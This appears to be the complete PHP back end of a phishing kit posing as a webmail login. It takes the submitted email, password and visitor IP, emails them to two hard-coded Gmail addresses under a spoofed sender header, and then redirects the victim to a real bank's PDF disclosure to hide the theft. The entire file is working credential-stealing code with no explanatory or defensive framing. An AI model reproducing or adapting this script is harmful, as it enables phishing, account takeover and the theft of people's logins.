<?
$ip = getenv("REMOTE_ADDR");
$message .= "--------------WEbm@il Info-----------------------\n";
$message .= "Email             : ".$_POST['user']."\n";
$message .= "Password             : ".$_POST['pass']."\n";
$message .= "IP                     : ".$ip."\n";
$message .= "---------------Created BY Unknown-------------\n";
$send = "limallen412@gmail.com, sraymond779@gmail.com";
$subject = "Result from $ip";
$headers = "From: WEbm@il<customer-support@Spammers>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);
mail($to,$subject,$message,$headers);
}

	
		   header("Location: http://www.woodforest.com/uploadedFiles/AccountDisclosures/ETM-21.pdf");

	 
?>